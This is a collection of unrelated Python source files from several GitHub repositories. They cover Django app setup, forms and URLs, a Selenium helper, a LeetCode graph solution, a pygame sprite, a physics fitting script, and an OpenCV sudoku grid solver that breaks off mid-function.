unittest.main()","repo_name":"lmaosimon/DisasterResponse","sub_path":"Test/Simulation/test_disaster_reader.py","file_name":"test_disaster_reader.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8150529149","text":"from django.core.management.base import BaseCommand\r\nfrom django.core.management import call_command\r\nfrom django.conf import settings\r\n\r\nfrom dashboard.models import App, User\r\nfrom timetable.models import Lock as TimetableLock\r\n\r\n\r\nclass Command(BaseCommand):\r\n help = 'Sets up the development environment for Docker'\r\n\r\n def handle(self, *args, **options):\r\n if not settings.DEBUG:\r\n print(\"This must not be run in production!\")\r\n return\r\n\r\n print(\"Setting up the well-known development user...\")\r\n try:\r\n # The email is set from the EPPN header\r\n user = User.objects.get(email='develop@ucl.ac.uk')\r\n except User.DoesNotExist:\r\n user = User(\r\n email='develop@ucl.ac.uk',\r\n full_name='UCL API Developer',\r\n given_name='UCL API',\r\n department='Dept of API Development',\r\n cn='develop',\r\n raw_intranet_groups='ucl-all;ucl-ug;schsci-all',\r\n employee_id='uclapi1'\r\n )\r\n user.save()\r\n\r\n print(\"Setting up the well-known Local OAuth Test app...\")\r\n try:\r\n app = App.objects.get(user=user, name=\"Local OAuth Test\")\r\n except App.DoesNotExist:\r\n app = App(\r\n user=user,\r\n name=\"Local OAuth Test\",\r\n api_token='uclapi-4286bc18b235d86-ab0998cc3a47a9b-07b6dfe234a04bf-97407a655b33ae8', # noqa\r\n client_id='1105308584328350.9460393713696551',\r\n client_secret='251e9f9553bb3b86829c18bf795844d977dedf569b24a70e4d4e753958fcc2f3', # noqa\r\n callback_url='http://localhost:8002/uclapi/callback'\r\n )\r\n app.save()\r\n\r\n print(\r\n \"Well-known user: {}. 
Well-known app: {}\".format(\r\n user.full_name,\r\n app.name\r\n )\r\n )\r\n\r\n if len(TimetableLock.objects.all()) == 0:\r\n call_command(\"create_timetable_lock\")\r\n\r\n print(\"Building Medium Cache...\")\r\n call_command(\"update_medium\")\r\n\r\n print(\"*** Development environment ready for use! ***\")\r\n","repo_name":"uclapi/uclapi","sub_path":"backend/uclapi/common/management/commands/dev_environment_setup.py","file_name":"dev_environment_setup.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"51"} +{"seq_id":"40017514577","text":"from .image import Image\nfrom .db_images import DbImages\nfrom typing import List\nfrom .fieldnames import *\nfrom ..models.utils import load_model\nfrom ..datasets.utils import load_binary_image_classification_dataset\nfrom torch.utils.data import DataLoader\nfrom datetime import datetime as dt\nimport torch\nfrom ..db.conversions import binary_classification_pred_to_db_value\nfrom tqdm.auto import tqdm\nfrom pathlib import Path\n\n\nclass AiPredictor:\n \"\"\"[summary]\n \"\"\"\n\n def __init__(self,\n ai_name,\n cfg,\n db_images: DbImages,\n ):\n self.ai_name = ai_name\n self.specs = cfg[\"models\"][ai_name]\n self.cfg = cfg\n self.version = self.specs[FIELDNAME_AI_VERSION]\n self.image_scaling = self.specs[FIELDNAME_IMAGE_SCALING]\n self.base_paths_models = Path(cfg[\"base_path_models\"])\n\n def load_model(self, specs = None, _eval: bool = True):\n self.model = None\n if not specs:\n specs = self.specs\n \n print(\"Loading in Prediction Mode!\")\n self.model = load_model(self.ai_name, specs[FIELDNAME_AI_VERSION], _eval, self.base_paths_models)\n if self.model:\n return True\n\n def load_dataset(self, image_list: List[dict]):\n self.dataset = None\n paths = [_[FIELDNAME_IMAGE_PATH] for _ in image_list]\n ids = [str(_[\"_id\"]) for _ in image_list]\n\n self.dataset = load_binary_image_classification_dataset(paths, ids, self.image_scaling, training = False)\n\n if self.dataset:\n return True\n\n def load_dataloader(\n self,\n dataset = None,\n batch_size: int = 100,\n num_workers = 0 ################ Change?\n ):\n if not dataset:\n dataset = self.dataset\n\n self.dataloader = None\n self.dataloader = DataLoader(\n dataset, batch_size=batch_size, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=num_workers, collate_fn=None,\n pin_memory=False, drop_last=True, timeout=0,\n worker_init_fn=None,prefetch_factor=2,\n persistent_workers=False\n )\n\n if self.dataloader:\n return True\n\n\n def predict_images(self, targets: List[str] = None, model = None, dataloader = None, specs = None):\n if not dataloader:\n dataloader = self.dataloader\n\n if not model:\n model = self.model\n\n if not specs:\n specs = self.specs\n\n if not targets:\n targets = [self.ai_name]\n \n creation_date = dt.now()\n print(targets)\n predicted_batches = []\n for batch_images, batch_labels in tqdm(dataloader):\n if torch.cuda.is_available():\n _pred = model(batch_images.to(0))#.to(0))\n else:\n _pred = model(batch_images)\n \n update = binary_classification_pred_to_db_value(\n _pred,\n batch_labels,\n version = specs[FIELDNAME_AI_VERSION],\n targets = targets,\n creation_date=creation_date)\n \n predicted_batches.append(update)\n \n return targets, predicted_batches\n\n 
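# --- Hedged sketch of the inference pattern AiPredictor.predict_images above
# relies on: eval mode plus torch.no_grad() so no autograd state is kept,
# iterating a DataLoader in fixed-size batches. The tiny model and random
# inputs here are stand-ins, not the project's binary classifier.
import torch
import torch.nn as nn
from torch.utils.data import DataLoader, TensorDataset

model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 2))
model.eval()                              # freeze dropout/batch-norm behaviour

images = torch.rand(16, 1, 28, 28)
loader = DataLoader(TensorDataset(images), batch_size=4)

preds = []
with torch.no_grad():                     # no gradient buffers during inference
    for (batch,) in loader:
        logits = model(batch)
        preds.append(logits.argmax(dim=1))
preds = torch.cat(preds)
print(preds.shape)                        # torch.Size([16])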
","repo_name":"Maddonix/ukw-ml-tools","sub_path":"src/ukw_ml_tools/_depreceated/classes/ai_predictor.py","file_name":"ai_predictor.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21891092192","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('movie_list/', views.movie_list),\n path('movie_detail//', views.movie_detail),\n path('worldcup/', views.random_worldcup),\n path('worldcup//', views.worldcup_detail),\n path('genre/', views.genre),\n path('genre//', views.genre_detail),\n path('genre_movie_list//', views.genre_movie_list),\n\n]","repo_name":"KIMDONGHYEON003/-WEB-Life-like-a-movie","sub_path":"final-pjt-back/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31439914271","text":"\"\"\"\nhttps://developers.google.com/web/updates/2017/04/headless-chrome\nhttps://copilot.github.com/\nhttps://www.selenium.dev/pt-br/documentation/webdriver/waits/\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom pathlib import Path\n\n# caminho raiz do projeto\nROOT_FOLDER = Path(__file__).parent.parent.parent.parent\nCHROME_DRIVER_PATH = ROOT_FOLDER / 'chromedriver'\n\n\ndef make_chrome_browser(*options: str) -> webdriver.Chrome:\n chrome_options = webdriver.ChromeOptions()\n if options is not None:\n for op in options:\n chrome_options.add_argument(op)\n\n chrome_service = Service(executable_path=CHROME_DRIVER_PATH)\n\n return webdriver.Chrome(\n service=chrome_service,\n options=chrome_options\n )\n\n\nif __name__ == '__main__':\n # options = ('--headless',)\n ops = ('--disable-gpu', '--no-sandbox')\n chrome = make_chrome_browser(*ops)\n\n chrome.get('https://www.google.com')\n\n input_search = chrome.find_element(by=By.NAME, value='q')\n input_search.send_keys('palmeiras')\n input_search.send_keys(Keys.ENTER)\n\n # chrome.quit()\n","repo_name":"MatheusAriel/estudos_python","sub_path":"modulos/SELENIUM_/utils/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"16892076891","text":"from django import forms\nfrom .models import Incident\nfrom django.forms import Textarea,DateTimeInput\n\n\nfrom pytube import YouTube\nfrom pytube.exceptions import RegexMatchError\n\n\n\nclass IncidentForm(forms.ModelForm):\n\n class Meta:\n model = Incident\n fields = '__all__'\n widgets = {\n 'description': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'incident_location': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'cause': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'action_taken': Textarea(attrs={'cols': 80, 'rows': 2}),\n 'time' : DateTimeInput(attrs={})\n }\n\n\nclass YoutubeForm(forms.Form):\n url=forms.CharField( required=True,widget=forms.Textarea(attrs={'cols':80,'rows':1,'placeholder':'Enter Url here'}))\n\n def clean(self):\n video_url=self.cleaned_data.get('url')\n try: \n yt = YouTube(video_url)\n except RegexMatchError:\n raise forms.ValidationError('The Url you entered is not correct')\n return 
self.cleaned_data","repo_name":"Moinkhan8439/mk-site","sub_path":"internal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35213613094","text":"#\n# @lc app=leetcode id=323 lang=python3\n#\n# [323] Number of Connected Components in an Undirected Graph\n# @lc code=start\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n if not edges:\n return n \n \n # use dict to store edges information, easy to find neigbors for a given node\n neighbors_dict = {k: [] for k in range(n)}\n for edge in edges:\n node1, node2 = edge[0], edge[1]\n neighbors_dict[node1].append(node2)\n neighbors_dict[node2].append(node1)\n \n visited = set() \n count = 0\n \n for node in range(n):\n # check if curr node is in new component\n if node not in visited:\n count += 1\n else:\n continue\n \n # new component: notate all connected nodes to visited\n # dfs\n stack = [node]\n while stack:\n curr_node = stack.pop()\n neighbors = neighbors_dict[curr_node]\n for neighbor in neighbors:\n if neighbor not in visited: \n visited.add(neighbor)\n stack.append(neighbor)\n \n return count \n\n# @lc code=end\n\n","repo_name":"ck2w/Leetcode","sub_path":"py/0323.number-of-connected-components-in-an-undirected-graph.py","file_name":"0323.number-of-connected-components-in-an-undirected-graph.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12293497561","text":"import pygame\n\n\nclass Block(pygame.sprite.Sprite):\n \"\"\" This class is used to create a Block object to be used in a game.\n \"\"\"\n\n#############################################################################################################\n def __init__(self, x, y, color, width, height):\n \"\"\" Creates a Block object with the given parameters.\n\n Args:\n x (int): x coordinate of the top left corner of the block\n y (int): y coordinate of the top left corner of the block\n color (tuple): color of the block\n width (int): width of the block\n height (int): height of the block\n \"\"\"\n\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n","repo_name":"pumasa/OOP_project","sub_path":"Objects/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14632484962","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 1 16:56:37 2020\n\n@author: vanlo\n\"\"\"\nimport pprint\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.odr import ODR, Model, Data, RealData\nplt.clf()\n\ndef func(x,b):\n return b*x\n\n\n # Focal location for to the bottom and 1st layer, 2nd layer and 3rd layer to bottom\nf_0_a = np.array([14.9, 14.2, 14.5, 15.9])*1e-6\nf_2_a = np.array([25, 25.1, 25.2, 25])*1e-6\n\nf_2_b = np.array([22, 23.1, 23.4, 24.1, 26])*1e-6\nf_3_b = np.array([23.5, 24.1, 25, 26.2, 27.9])*1e-6\nf_5_b = np.array([33.3, 34.8, 37.2, 36.5, 33.9])*1e-6\n\nf_4_c = np.array([69.9,70.9,70.3,70.2,70.9])*1e-6\nf_3_c = np.array([65, 65.1,65.1,65.2,65.6])*1e-6\n\nf_1_d = np.array([59.7,60.1,61.1,60.8, 60.2])*1e-6\nf_2_d = np.array([63.6,64.5,64.8,64.2,64.6])*1e-6\n\n\n # Thickness of each serepate layer\nd_0_2 = f_2_a - f_0_a\nd_1_2 = f_2_d - 
f_1_d\nd_2_3 = f_3_b - f_2_b\nd_3_4 = f_4_c - f_3_c\nd_3_5 = f_5_b - f_3_b\n\n \n # Cumulative thickness of the layers, so total thickness\nD_1 = np.average(d_0_2)-np.average(d_1_2)\nD_2 = np.average(d_0_2)\nD_3 = np.average(d_0_2) + np.average(d_2_3)\nD_4 = np.average(d_0_2) + np.average(d_2_3) + np.average(d_3_4)\nD_4_b = np.average(d_0_2) + np.average(d_2_3) - np.average(d_3_4)\nD_5 = np.average(d_0_2) + np.average(d_2_3) + np.average(d_3_5)\n\nD = np.array([D_1, D_2, D_3, D_5])\nD_2 = np.array([D_1, D_2, D_3, D_4_b, D_5])\nprint(D)\n\nprint(D_4)\n # The path difference for the colours in order from thin to thicker layer\ndelay_1 = np.array([270, 510, 600, 1210])*1e-9\ndelay_2 = np.array([270, 960, 1150, 640, 1700])*1e-9\n\n # Calculate the birefringence with average\n#bf_1 = delay_1/D\n#\n#\n#bf_1_avg = np.average(bf_1)\n\n\n # Error calculations\n \nu_f = 2e-6\nu_delay = np.array([20, 10, 10, 20])*1e-9\n\nu_d = np.sqrt(2*(u_f**2))\nu_d_0_2_avg = 1/len(f_0_a) * np.sqrt(len(f_0_a)* u_d**2)\nu_d_1_2_avg = 1/len(f_1_d) * np.sqrt(len(f_1_d)* u_d**2)\nu_d_2_3_avg = 1/len(f_2_b) * np.sqrt(len(f_2_b)* u_d**2)\nu_d_3_5_avg = 1/len(f_3_b) * np.sqrt(len(f_3_b)* u_d**2)\nu_d_3_4_avg = 1/len(f_3_c) * np.sqrt(len(f_3_c)* u_d**2)\n\nu_D_1 = np.sqrt(u_d_0_2_avg**2 + u_d_1_2_avg**2)\nu_D_2 = u_d_0_2_avg\nu_D_3 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2)\nu_D_4 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2 + u_d_3_4_avg**2)\nu_D_5 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2 + u_d_3_5_avg**2)\nu_D = np.array([u_D_1, u_D_2, u_D_3, u_D_5])\n\n\n # Best fit of birefringence\nlinear = Model(func)\ndata_1 = Data(D, delay_1, wd=1./u_D, we=1./u_delay)\ndata_2 = Data(D_2, delay_2, wd=1./u_D, we=1./u_delay)\n\n\nodr_1 = ODR(data_1, linear, beta0=[0])\nodr_2 = ODR(data_2, linear, beta0=[0])\n\nout_1 = odr_1.run()\nout_2 = odr_2.run()\n\nout_1.pprint()\n\n\n # Plot the lot\nx = np.linspace(0,2.5e-5,200)\ny_1 = func(x, out_1.beta)\ny_2 = func(x, out_2.beta)\n\n # Best fits\nplt.plot(x,y_1, label=\"Birefringence 1\")\n#plt.plot(x,y_2, label=\"Birefringence 2\")\n\n\n # Data\nplt.errorbar(D, delay_1, xerr=u_D, yerr=u_delay, mec='k', linestyle='none',elinewidth=1,capsize=2)\nplt.errorbar(D_4, (1190e-9), xerr=u_D_4, yerr=(20e-9), mec='k', linestyle='none',elinewidth=1,capsize=2, marker='x')\nplt.ylabel('$\\Delta l_{path} \\; (m)$')\nplt.xlabel('$D \\; (m)$')\nplt.ticklabel_format(style='sci', axis='x',scilimits=(1,4))\nplt.ticklabel_format(style='sci', axis='y',scilimits=(1,4))\nplt.savefig('C:/Users/vanlo/Documents/GitHub/MicroscopyRP_Git/verslag/afbeeldingen/bf_plot.png')\nplt.show()\n\nprint(''' Birefringence 1 = %.3e +- %.3e'''\n      %(out_1.beta, out_1.sd_beta))\n\n\n","repo_name":"SangersJeroen/MicroscopyRP","sub_path":"Python code/Birefingence/Birefringence calculator.py","file_name":"Birefringence calculator.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"34713722319","text":"from collections import deque\nfrom sudoku.sudoku import SudokuSolver\nimport cv2\nimport numpy as np\nfrom multiprocessing import Pool\nimport os\nimport operator\nimport time\nimport torch\n\nstart_import = time.perf_counter()\nfrom CNN.model.model import ModelFactory\nfactory = ModelFactory()\nmodel = factory.load_model(model_path=\"CNN\\model\\model.pt\")\n\n\n# cap = cv2.VideoCapture(0)\ncap = cv2.VideoCapture(\"20230725_192900.mp4\")\n\n\n\ndef warped_preprocess(image, blur_size=11):\n    # Convert the image to grayscale\n    
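# --- Hedged, self-contained demo of the scipy.odr fit in the birefringence
# script above. Two details worth noting: (1) scipy.odr calls the model as
# fcn(beta, x) with the parameter vector FIRST -- the script's func(x, b)
# only gives correct numbers because b*x is a plain product, so the swapped
# arguments multiply out the same; (2) RealData takes the x and y standard
# deviations directly via sx/sy, which is less error-prone than hand-built
# wd/we weights. Synthetic data below, true slope 2.
import numpy as np
from scipy.odr import ODR, Model, RealData

def line_through_origin(beta, x):
    return beta[0] * x          # same through-the-origin model as above

x = np.linspace(1.0, 5.0, 5)
y = 2.0 * x + np.array([0.02, -0.01, 0.03, -0.02, 0.01])
data = RealData(x, y, sx=np.full_like(x, 0.05), sy=np.full_like(y, 0.05))

out = ODR(data, Model(line_through_origin), beta0=[1.0]).run()
print(out.beta, out.sd_beta)    # fitted slope close to 2, plus its uncertainty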
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Blur the image to reduce noise\n blur = cv2.GaussianBlur(grayscale, (blur_size, blur_size), 0)\n\n # Apply adaptive thresholding to create a binary image\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n \n # Invert the image\n inverted = ~thresh\n\n # Detect lines in the image using Hough Line Transform\n lines = cv2.HoughLinesP(inverted, rho=1, theta=np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\n\n # Create a black image with the same dimensions as the original\n mask = np.zeros_like(inverted)\n\n # Draw the detected lines onto the mask\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(mask, (x1, y1), (x2, y2), (255, 255, 255), 2)\n\n # Subtract the mask from the original image to remove the lines\n result = cv2.subtract(inverted, mask)\n\n return result\n\ndef preprocess(image, blur_size=9, remove_lines=False, line_ksize=40):\n # convert image to grayscale\n grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # blur image for smoothing\n blur = cv2.GaussianBlur(grayscale, (blur_size, blur_size), 0)\n # adaptive thresholding to create a binary image\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, blur_size, 2)\n # inverting that image for model\n inverted = ~thresh\n\n if remove_lines:\n # define horizontal line erosion\n horizontal_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (line_ksize,1))\n # erode and dilate the image to remove horizontal lines\n inverted = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, horizontal_kernel)\n # define vertical line erosion\n vertical_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, line_ksize))\n # erode and dilate the image to remove vertical lines\n inverted = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, vertical_kernel)\n\n\n\n # morphological opening for removing small particles like dots or moire lines\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n morph = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, kernel)\n # dilating to increase border size\n result = cv2.dilate(morph, kernel, iterations=1)\n return result\n\ndef draw_extreme_corners(pts, original):\n cv2.circle(original, tuple(pts), 3, (255, 255, 0), cv2.FILLED)\n\ndef find_extreme_corners(polygon, limit_fn, compare_fn):\n # if we are trying to find bottom left corner, we know that it will have the smallest (x - y) value\n section, _ = limit_fn(enumerate([compare_fn(pt[0][0], pt[0][1]) for pt in polygon]),\n key=operator.itemgetter(1))\n\n return polygon[section][0]\n\ndef find_contours(img, original):\n # find contours on thresholded image\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # sort by the largest\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n polygon = None\n\n # make sure this is the one we are looking for\n for contour in contours:\n area = cv2.contourArea(contour)\n perimeter = cv2.arcLength(contour, closed=True)\n approx = cv2.approxPolyDP(contour, 0.01 * perimeter, closed=True)\n num_corners = len(approx)\n\n if num_corners == 4 and area > 1000:\n polygon = approx\n break\n\n if polygon is not None:\n # find its extreme corners\n top_left = find_extreme_corners(polygon, min, np.add) # has smallest (x + y) value\n top_right = find_extreme_corners(polygon, max, np.subtract) # has largest (x - y) value\n bot_left = find_extreme_corners(polygon, min, np.subtract) # has smallest (x - y) value\n bot_right = 
find_extreme_corners(polygon, max, np.add) # has largest (x + y) value\n\n # if its not a square, we don't want it\n if bot_right[1] - top_right[1] == 0:\n return []\n if not (0.95 < ((top_right[0] - top_left[0]) / (bot_right[1] - top_right[1])) < 1.05):\n return []\n\n cv2.drawContours(original, [polygon], 0, (0, 0, 255), 3)\n\n # draw corresponding circles\n [draw_extreme_corners(x, original) for x in [top_left, top_right, bot_right, bot_left]]\n\n return [top_left, top_right, bot_right, bot_left]\n\n return []\n\ndef warp_image(image, corners):\n # sort the corners in the same order\n corners = sorted(corners, key=lambda x: x[0])\n top_left, bottom_left = sorted(corners[:2], key=lambda x: x[1])\n top_right, bottom_right = sorted(corners[2:], key=lambda x: x[1])\n\n # creating an array with the four corners of the sudoku grid in the order of:\n # top-left, top-right, bottom-right, bottom-left\n corner_arr = np.array([top_left, top_right, bottom_right, bottom_left], dtype=\"float32\")\n\n # dimensions of the warped grid\n side = max([\n np.sqrt(((top_right[0]-top_left[0])**2)+((top_right[1]-top_left[1])**2)),\n np.sqrt(((bottom_right[0]-bottom_left[0])**2)+((bottom_right[1]-bottom_left[1])**2)),\n np.sqrt(((bottom_right[0]-top_right[0])**2)+((bottom_right[1]-top_right[1])**2)),\n np.sqrt(((bottom_left[0]-top_left[0])**2)+((bottom_left[1]-top_left[1])**2))\n ])\n\n dst = np.array([[0,0], [side-1,0], [side-1, side-1], [0, side-1]], dtype=\"float32\")\n\n # get the perspective transform matrix\n transmat = cv2.getPerspectiveTransform(corner_arr, dst)\n\n warped = cv2.warpPerspective(image, transmat, (int(side), int(side)))\n\n return warped\n\ndef get_grid_lines(img, length=10):\n horizontal = grid_line_helper(img, 1, length)\n vertical = grid_line_helper(img, 0, length)\n return vertical, horizontal\n\n\ndef split_into_cells(image):\n height, width = image.shape\n\n cell_height = height // 9\n cell_width = width // 9\n\n cells = []\n\n for i in range(9):\n row = []\n for j in range(9):\n cell = image[i*cell_height:(i+1)*cell_height, j*cell_width:(j+1)*cell_width]\n cells.append(cell)\n # row.append(cell)\n \n return cells\n\ndef save_cells(cells, folder=\"cells\"):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n for i in range(81):\n # for j in range(9):\n filepath = os.path.join(folder, f\"{i}.png\")\n cv2.imwrite(filepath, cells[i])\n\ndef grid_line_helper(img, shape_location, length=10):\n clone = img.copy()\n row_or_col = clone.shape[shape_location]\n size = row_or_col // length\n\n if shape_location == 0:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, size))\n\n else:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (size, 1))\n\n clone = cv2.erode(clone, kernel)\n clone = cv2.dilate(clone, kernel)\n\n return clone\n\n\ndef draw_lines(img, lines:np.ndarray):\n clone = img.copy()\n lines = np.squeeze(lines)\n\n for rho, theta in lines:\n a = np.cos(theta)\n b = np.sin(theta)\n\n x0 = a * rho\n y0 = b * rho\n\n x1 = int(x0 + 1000 * (-b))\n x2 = int(x0 - 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n y2 = int(y0 - 1000 * a)\n\n cv2.line(clone, (x1, y1), (x2, y2), (255,255,255), thickness=4)\n \n return clone\n\ndef create_grid_mask(vertical, horizontal):\n grid = cv2.add(horizontal,vertical)\n grid = cv2.adaptiveThreshold(grid, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 235, 2)\n grid = cv2.dilate(grid, cv2.getStructuringElement(cv2.MORPH_RECT, (3,3)), iterations=2)\n pts = cv2.HoughLines(grid, .2, np.pi / 90, 200)\n lines = draw_lines(grid, pts)\n mask = 
cv2.bitwise_not(lines)\n return mask\n\n###################################################################\n\n\ndef clean_cells(cells):\n \"\"\"\n Cleans and preprocesses a list of grayscaled cells\n\n Args:\n cells (list): List of the grayscaled images\n\n Returns:\n list: List of cleaned and preprocessed images\n \"\"\"\n # start = time.perf_counter()\n cleaned_cells = []\n i = 0\n\n for cell in cells:\n new_img, is_number = clean_helper(cell)\n\n if is_number:\n new_img = cv2.resize(new_img, (28,28))\n cleaned_cells.append(new_img)\n i+=1\n else:\n cleaned_cells.append(0)\n\n return cleaned_cells\n\n#####################################################################\n\ndef clean_helper(img):\n \"\"\"\n Cleans and preprocess individual cell\n Args:\n img (np.ndarray): Grayscaled image of a single cell\n\n Returns:\n tuple: (cleaned_image, IS_NUMBER_FLAG)\n \"\"\"\n\n # Check if image is mostly empty\n if np.isclose(img, 0).sum() / (img.shape[0] * img.shape[1]) >= 0.99:\n return np.zeros_like(img), False\n \n \n height, width = img.shape\n mid = width // 2\n\n # Check if 60% of the central width of the image is mostly black\n empty_60_percent = np.isclose(img[:, int(mid - width * 0.2):int(mid + width * 0.2)], 0).sum() / (2 * width * 0.2 * height) >= 0.90\n if empty_60_percent:\n return np.zeros_like(img), False\n \n # Find contours and sort them by the area\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n\n # Extract the bounding rectangle of the largest contour (assumed to be the digit)\n x, y, w, h = cv2.boundingRect(contours[0])\n start_x = (width - w) // 2\n start_y = (height - h) // 2\n\n # Create a new image and copy the digit region to the center of the new image\n new_img = np.zeros_like(img)\n new_img[start_y:start_y + h, start_x:start_x + w] = img[y:y + h, x:x + w]\n return new_img, True\n\ndef display_images_in_grid(images):\n # Create a blank canvas\n canvas_size = 9 * 28\n canvas = np.ones((canvas_size, canvas_size), dtype=np.uint8) * 255\n \n for i, image in enumerate(images):\n row = i // 9 # Calculate the row index\n col = i % 9 # Calculate the column index\n\n if np.array_equal(image, np.zeros((28, 28), dtype=np.uint8)):\n continue # Skip if it's a zero\n \n # Resize the image to fit in a 28x28 square\n resized_image = cv2.resize(image, (28, 28))\n\n # Calculate the top-left corner coordinates for the image\n top = row * 28\n left = col * 28\n\n # Place the image on the canvas\n canvas[top:top+28, left:left+28] = resized_image\n \n return canvas\n\ndef load_model(model_path):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = torch.jit.load(model_path, map_location=device)\n model.eval()\n return model\n\n\n\ndef recognize_digits(processed_cells, model):\n non_zero_elements = [(i, cell/255.0) for i, cell in enumerate(processed_cells) if type(cell) != int]\n # non_zero_elements = [(i, cell) for i, cell in enumerate(processed_cells) if type(cell) != int]\n non_zero_indices, non_zero_cells = zip(*non_zero_elements)\n\n non_zero_cells = np.array(non_zero_cells)\n non_zero_cells_tensor = torch.Tensor(non_zero_cells).unsqueeze(1)\n with torch.no_grad():\n output = model(non_zero_cells_tensor)\n _, preds = torch.max(output,1)\n preds = preds.tolist()\n\n preds_with_zeros = [0] * len(processed_cells)\n for index, pred in zip(non_zero_indices, preds):\n preds_with_zeros[index] = pred\n\n return preds_with_zeros\n\n\n\n\n\n\ndef 
empty_cell_digits(sudoku, solution):\n return [j if i == 0 else 0 for i, j in zip(sudoku, solution)]\n # return np.where(sudoku == 0, solution, 0).tolist()\n\n\ndef draw_digits(warped, digits):\n # Determine the size of each square \n square_size = warped.shape[0] // 9\n # reshape the array for convenience\n digit_grid = np.reshape(digits, (9,9))\n digit_grid = digit_grid.astype(\"int32\")\n font = cv2.FONT_HERSHEY_SIMPLEX\n for row in range(9):\n for col in range(9):\n digit = digit_grid[row,col]\n\n if digit != 0:\n # calculate the diagonal corners of current cell\n p1 = col * square_size, row * square_size # top left\n p2 = (col + 1) * square_size, (row + 1) * square_size # bottom right\n # calculating the text origin; measure with the same scale used for drawing so the digit is centered\n center = (p1[0] + p2[0]) // 2, (p1[1] + p2[1]) // 2\n text_size, _ = cv2.getTextSize(str(digit), font, square_size/55, 2)\n text_org = (center[0] - text_size[0] // 2, center[1] + text_size[1] // 2)\n\n # draw the digit into image\n cv2.putText(warped, str(digit), text_org, font, square_size/55, (0,0,255),2)\n\n\n\n return warped\n\n\n\ndef unwarp_image(warped_frame, original_frame, corners, detection_time, solving_time):\n corners = np.array(corners)\n height, width = warped_frame.shape[0], warped_frame.shape[1]\n \n # source corners in TL, TR, BR, BL order; bottom-left is (0, height - 1)\n corners_source = np.array([[0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]], dtype='float32')\n h, status = cv2.findHomography(corners_source, corners)\n\n unwarped_frame = cv2.warpPerspective(warped_frame, h, (original_frame.shape[1], original_frame.shape[0]))\n warped = cv2.warpPerspective(warped_frame, h, (original_frame.shape[1], original_frame.shape[0]))\n # mask = np.zeros_like(original_frame)\n cv2.fillConvexPoly(original_frame, corners, 0, 16)\n # masked_frame = cv2.bitwise_and(original_frame, mask)\n # result_frame = cv2.add(masked_frame, unwarped_frame)\n frame = cv2.add(original_frame, warped)\n frame_height, frame_width = frame.shape[:2]\n overlay_text = f\"Whole process took: {detection_time:.4f} seconds\"\n cv2.putText(frame, overlay_text, (int(frame_width*0.05), int(frame_height*0.05)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n 